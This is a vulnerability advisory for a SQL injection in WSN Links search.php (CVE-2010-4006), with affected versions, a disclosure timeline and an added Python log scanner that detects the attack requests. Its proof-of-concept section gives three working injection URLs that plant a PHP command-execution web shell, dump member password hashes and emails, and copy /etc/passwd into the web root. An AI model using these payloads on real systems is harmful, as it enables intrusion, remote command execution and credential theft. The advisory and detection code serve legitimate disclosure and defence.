WSN Links SQL Injection Vulnerability

01 Jul 2014 00:00:00 | Reported by Root | Type: seebug | Source: www.seebug.org

WSN Links SQL Injection Vulnerability, Allows for 'UNION SELECT' SQL Injection


                                                'WSN Links' SQL Injection Vulnerability (CVE-2010-4006)
Mark Stanislav - [email protected]


I. DESCRIPTION
---------------------------------------
A vulnerability exists in the search.php code that allows for SQL injection of various parameters. By assembling portions of SQL code between the affected parameters, successful SQL injection into the software can occur. In the testing done, various 'UNION SELECT' SQL injections can occur. 

 
II. AFFECTED VERSIONS
---------------------------------------
< 6.0.1; < 5.1.51; < 5.0.81


III. TESTED VERSIONS
---------------------------------------
5.1.40 & 5.1.49


IV. PoC EXPLOITS 
---------------------------------------
1) A 'UNION SELECT' which results in a PHP shell-execution script
http://example.com/search.php?namecondition=IS%20NULL))%20UNION%20((SELECT%20"<?php%20system($_REQUEST[cmd]);%20?>"%20INTO%20OUTFILE&namesearch=/var/www/exec.php&action=filter&filled=1&whichtype=categories

2) A 'UNION SELECT' which results in a member's name, password hash, and e-mail being extracted to a file
http://example.com/search.php?namecondition=IS%20NOT%20NULL))%20UNION%20((SELECT%20concat(name,0x3a,password,0x3a,email)%20FROM%20wsnlinks_members%20INTO%20OUTFILE&namesearch=/var/www/pass.txt&action=filter&filled=1&whichtype=categories

3) A 'UNION SELECT' which results in the /etc/passwd file being copied to a web directory file
http://example.com/search.php?namecondition=IS%20NOT%20NULL))%20UNION%20((SELECT%20load_file(0x2f6574632f706173737764)%20INTO%20OUTFILE&namesearch=/var/www/passwd.txt&action=filter&filled=1&whichtype=categories


V. NOTES 
---------------------------------------
* The above exploits require 'FILE' SQL privilege as well as poor web directory permissions to work. 
* Only 'namecondition' and 'namesearch' are utilized for the actual SQL injection.
* The vulnerability can potentially also be exploited so that user data is output directly to the browser.
* Passing 'debug=1' as a query value easily enables debug mode of tested 'WSN Links' deployments.
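
Added example (not part of the original advisory): a log check for the request shapes described in sections IV and V, flagging SQL syntax in 'namecondition' or 'namesearch' and use of 'debug=1' on search.php. The log lines are constructed, the combined log format and the benign value "LIKE" are assumptions, and the finding labels are names chosen for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# The two parameters the advisory says carry the injected SQL.
INJECTABLE = ("namecondition", "namesearch")
# SQL constructs from the advisory's requests that a search filter should never contain.
SQL_MARKERS = re.compile(r"\b(union|select|into\s+outfile|load_file)\b|\)\)", re.I)
# Request target inside a combined-format access log line.
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (not real traffic); the benign value "LIKE" is an assumption.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Nov/2010:10:00:00 +0000] "GET /search.php?namecondition=LIKE&namesearch=news&action=filter&filled=1&whichtype=categories HTTP/1.1" 200 5120',
    '192.0.2.77 - - [01/Nov/2010:10:00:05 +0000] "GET /search.php?namecondition=IS%20NOT%20NULL))%20UNION%20((SELECT%201%20INTO%20OUTFILE&namesearch=/tmp/out.txt&action=filter&filled=1&whichtype=categories HTTP/1.1" 200 312',
    '192.0.2.77 - - [01/Nov/2010:10:00:09 +0000] "GET /search.php?debug=1 HTTP/1.1" 200 9001',
]

def inspect_request(target):
    """Return finding labels for one request target (path plus query string)."""
    parts = urlsplit(target)
    if not parts.path.endswith("/search.php"):
        return []
    params = parse_qs(parts.query, keep_blank_values=True)  # URL-decodes each value
    values = {name: " ".join(params.get(name, [])) for name in INJECTABLE}
    findings = [f"sql-in-{name}" for name, value in values.items()
                if SQL_MARKERS.search(value)]
    # The SQL is assembled from both parameters, so also test them joined.
    if not findings and SQL_MARKERS.search(" ".join(values.values())):
        findings.append("sql-split-across-parameters")
    if "1" in params.get("debug", []):
        findings.append("debug-enabled")
    return findings

def scan(lines):
    """Return {line_number: findings} for log lines that warrant review."""
    hits = {}
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        found = inspect_request(match.group(1)) if match else []
        if found:
            hits[number] = found
    return hits

if __name__ == "__main__":
    for number, found in scan(SAMPLE_LOG).items():
        print(number, ", ".join(found))
```

A hit is a lead for review rather than proof of compromise, since an ordinary search term such as "select" in 'namesearch' is flagged as well.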


VI. SOLUTION
---------------------------------------
Upgrade to the most recent version of your 'WSN Links' code branch.


VII. REFERENCES
---------------------------------------
http://www.wsnlinks.com/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4006
http://www.uncompiled.com/2010/10/wsn-links-sql-injection-vulnerability-cve-2010-4006/

VIII. TIMELINE
---------------------------------------
10/10/2010: Initial disclosure e-mail to the vendor
10/18/2010: Follow-up via the vendor's contact web form
10/18/2010: Vendor acknowledgement/commitment to fix
10/21/2010: Patched versions released
10/31/2010: Public disclosure
                              
